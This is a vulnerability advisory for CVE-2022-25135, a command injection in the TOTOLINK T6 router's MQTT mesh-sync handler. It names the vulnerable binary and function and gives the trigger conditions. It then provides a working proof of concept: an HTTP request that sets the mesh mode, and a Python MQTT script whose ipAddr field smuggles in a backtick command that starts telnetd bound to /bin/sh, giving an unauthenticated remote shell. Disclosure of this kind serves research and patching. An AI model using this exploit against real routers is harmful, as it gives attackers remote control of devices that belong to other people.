Headline
CVE-2022-25135: my_vuln/19.md at main · pjqwudi1/my_vuln
A command injection vulnerability in the function recv_mesh_info_sync of TOTOLINK Technology router T6 V3_Firmware T6_V3_V4.1.5cu.748_B20211015 allows attackers to execute arbitrary commands via a crafted MQTT packet.
TOTOLINK Vulnerability
Vendor:TOTOLINK
Product:T6
Version:T6 V3_Firmware(T6_V3_V4.1.5cu.748_B20211015)(Download Link:https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/190/ids/36.html)
Type:Remote Command Execution
Author:Jiaqian Peng
Institution:[email protected]
Vulnerability description
We found an Command Injection vulnerability in TOTOLINK Technology router with firmware which was released recently,allows remote attackers to execute arbitrary OS commands from a crafted request.(MQTT, no authentication required)
Remote Command Execution
In wireless.so
binary:
In recv_mesh_info_sync
function,ipAddr
is directly passed by the attacker, so we can control the ipAddr
to attack the OS.
It should be noted that here you need to ensure that the value of apmib_get(18091, &v11)
is not 1.
Where does the value of apmib_get(18091, &v11)
come from?
In setWiFiMeshConfig
function
Supplement
The trigger point of this vulnerability is deep in the program path, so we recommend that the string content should be strictly checked when extracting user input.
Vulnerability trigger steps:
- set
masterMode
=2, in (setWiFiMeshConfig
) - set
ipAddr
, in (recv_mesh_info_sync
)
PoC
We set masterMode
as 2 , and the router will excute it,such as:
POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 66 Origin: http://192.168.1.1 Connection: close Referer: http://192.168.1.1/basic/mesh.html Cookie: SESSION_ID=2:1644745071:2
{"effectType":"2","masterMode":"2","topicurl":"setWiFiMeshConfig"}
We set ipAddr
as telnetd -l /bin/sh -p 10004
, and the router will excute it,such as:
import paho.mqtt.client as mqtt client = mqtt.Client() client.connect("192.168.1.1",1883,60) client.publish(‘totolink/router/recv_mesh_info_sync’,payload=’{"ipAddr":"`telnetd -l /bin/sh -p 10004`","md5Val":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","staticInfoFlag":"0"}’)
Result
Get a shell!